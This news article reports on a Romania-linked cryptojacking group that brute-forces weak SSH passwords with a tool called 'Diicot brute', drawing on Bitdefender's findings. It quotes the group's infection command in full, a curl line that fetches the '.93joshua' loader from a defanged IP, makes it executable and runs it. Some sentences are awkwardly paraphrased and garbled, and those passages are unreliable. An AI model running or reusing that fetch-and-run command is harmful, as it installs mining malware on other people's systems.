A cryptojacking group that is believed to be based in Romania uses a new SSH (Secure Shell Protocol) brute-forcer called “Diicot brute” to crack passwords on Linux-based devices with weak passwords.
Bitdefender researchers said in a report released on Wednesday that the campaign’s focus was mainly to deploy Monero mining malware. However, the gang’s kit allows them to try other types of attacks. The researchers stated that they had linked the group to at least two distributed denial of service (DDoS) botnets: a variant of the Linux-based DDoS DemonBot botnet called “Chernobyl” and a Perl IRC botnet.
Why did they choose cryptojacking, you may wonder; that’s because it is a shortcut to get to the “prey.” According to the report:
“As you all know, mining for cryptocurrency is slow and tedious, but it can go faster when using multiple systems. Owning multiple systems for mining is not cheap, so attackers try the next best thing: To remotely compromise devices and use them for mining instead.”
Weak credentials on Linux devices
There is no surprise when we’re talking about weak passwords; therefore, default usernames and passwords, or weak credentials that hackers can easily crack through brute-forcing, are a significant and unfortunate given in cybersecurity.
Researchers stated in the report mentioned that it is not uncommon for hackers to go after weak SSH credentials; however, the tricky part isn’t necessarily brute-forcing credentials but rather “doing it in a way that lets attackers go undetected.”
The author of the Diicot brute tool claimed that it could filter out honeypots, explains analysts. It may be this way, but “this investigation is proof that it doesn’t, or at least it couldn’t evade ours,” noted the analysts.
Bitdefender’s honeypot data, a Romanian cybersecurity technology company, shows that attacks matching the brute-force tool’s signature started in January. However, they said that the campaign has not yet spread the worm on the infected system, at least not yet:
“The IP addresses they originate from belong to a relatively small set, which tells us that the threat actors are not yet using compromised systems to propagate the malware (worm behavior).”
The group was traced in Romania
After analyzing its tools and methods, Bitdefender found the threat group, including heavy confusion with Bash scripts (the default login shell for more Linux distributions) compiled with a shell script compiler (shc). The hackers also used Discord to report the information back, which is an increasingly popular move used by the attackers.
Malicious fraud of cooperation tools like Slack and Discord to evade security and deliver data thieves, remote-access Trojans (RATs), and other malware has increased. For example, in April, Cisco’s Talos cybersecurity team reported on collaboration app abuse that they found 20.000 virus results on just one Discord network search.
By using Discord, hackers accomplish a few things: it relieves attackers of having to host their own C2 (command-and-control) server since webhooks (automated messages sent from apps when something happens) are ways to post data Discord channel through programming, explained the report. In addition, Discord presents collected data for relevant viewing on a channel.
“Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution (use of its CDN), C2 (webhooks), or creating communities centered around buying and selling malware source code and services (e.g., DDoS),” says the article.
This information can also allow threat actors to evaluate the performance of their tools in infecting machines. Similarly, threat actors can scan the list of victims for future, potential, and later exploited hijinks.
What determined the cryptojacking tracking?
The group’s investigation first started in May, when analysts discovered a cryptojacking campaign with the “.93joshua” loader. Analysts noted that:
“It turns out that the server hosted other files. Although the group hid many of the files, their inclusion in other scripts revealed their presence.”
They also found that the associated domain, mexalz.us, has hosted malware “at least since February.”
Handy cryptojacking tools
It can be concluded from Bitdefender that the brute-force cracker is distributed on the as-a-service model, given that it uses a centralized API server. The attackers who rent the tool provide their API key in their scripts following the report. And for the fact, this is where the Romania link comes in, explains the report:
“Like most other tools in this kit, the brute-force tool has its interface in a mix of Romanian and English. This leads us to believe that its author is part of the same Romanian group.”
The researchers said that the group has been active since at least 2020.
Attacks in a series
Before they conceal their tracks with techniques such as hiding behind Discord, cryptojackers first need to find weak credentials, which they do by scanning. The researchers stated that the cryptojacking attackers, in this case. Hosted multiple files on the server, including jack.tar.gz, juanito.tar.gz, scn.tar.gz, and skamelot.tar.gz.
The archives contained toolchains for cracking servers with weak SSH credentials, a process that includes the following stages:
- Reconnaissance: identifying SSH servers via port scanning and banner grabbing
- Credential Access: identifying valid credentials via brute-force
- Initial Access: connecting via SSH and executing the infection payload
The hackers used the tools “ps” and “masscan” for reconnaissance, explained the analysts, while “99x/haiduc” (both Outlaw malware) and “brute” are used for credential access and initial access. Apart from traditional tools such as “masscan” and “zmap,” the threat actors’ toolkit in this instance included the previously unreported SSH brute-forcer, Diictot brute, which was written in Go.
The campaign (still active) includes the use of “skamelot.tar.gz,” which contains the following files:
- r (SHC compiled script) iterates through IP classes and runs Go
- Go (SHC compiled script) runs 99x (haiduc) with the infection payload
- p is a list of attempted credentials
According to the analysts, the payload file is still online, but the attackers have moved it to mexalz.us (from curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua && chmod 777 .93joshua && ./.93joshua && uname -a). The group also uses custom compiled binaries with embedded configurations of a legitimate miner named XMRig; an open-source miner adapted for cryptojacking in the past.
Brute Force is still working
Brute-force wouldn’t work if not for weak passwords that give threat actors an easy way to take over devices, noted the researchers: “People are the simple reason why brute-forcing SSH credentials still work.”
Analysts also found that tool, Diicot brute, in the jack.tar.gz and juanito.tar.gz archives. Unlike most of the tools used by Mexalz, it can’t be used on its own; therefore, it’s meant to be rented out on a SaaS (Software as a service) model.
Attackers reusing the tool led to easier tracking
Joseph Carson, chief security scientist, and advisory CISO at security firm Thycotic Centrify, stated that, relatively speaking, this campaign isn’t all that complicated, despite its use of a new brute-force tool.
“The techniques being used have been shared too often on the darknet, making it easy for anyone with a computer and an internet connection to start a cryptojacking campaign”.
Joseph Carson said that what helps in tracking these groups is that they use their favorite techniques and methods.
“When used often enough, these create a common fingerprint which can be used to track you digitally. The ones that are tough to track are the ones who hide behind stolen code or never reuse the same methods and techniques again.”
For every new campaign, they do something completely different, said Carson. But usually, these attackers are “well-funded and resourced”.
“Most cybercriminals will take the easy path and [that] is to reuse as [many] existing tools and techniques as possible. It will really depend on whether the attacker cares about being discovered or not.”
According to Joseph. the more steps an attacker takes to stay hidden “tends to mean they operate within a country which they could be prosecuted if discovered”!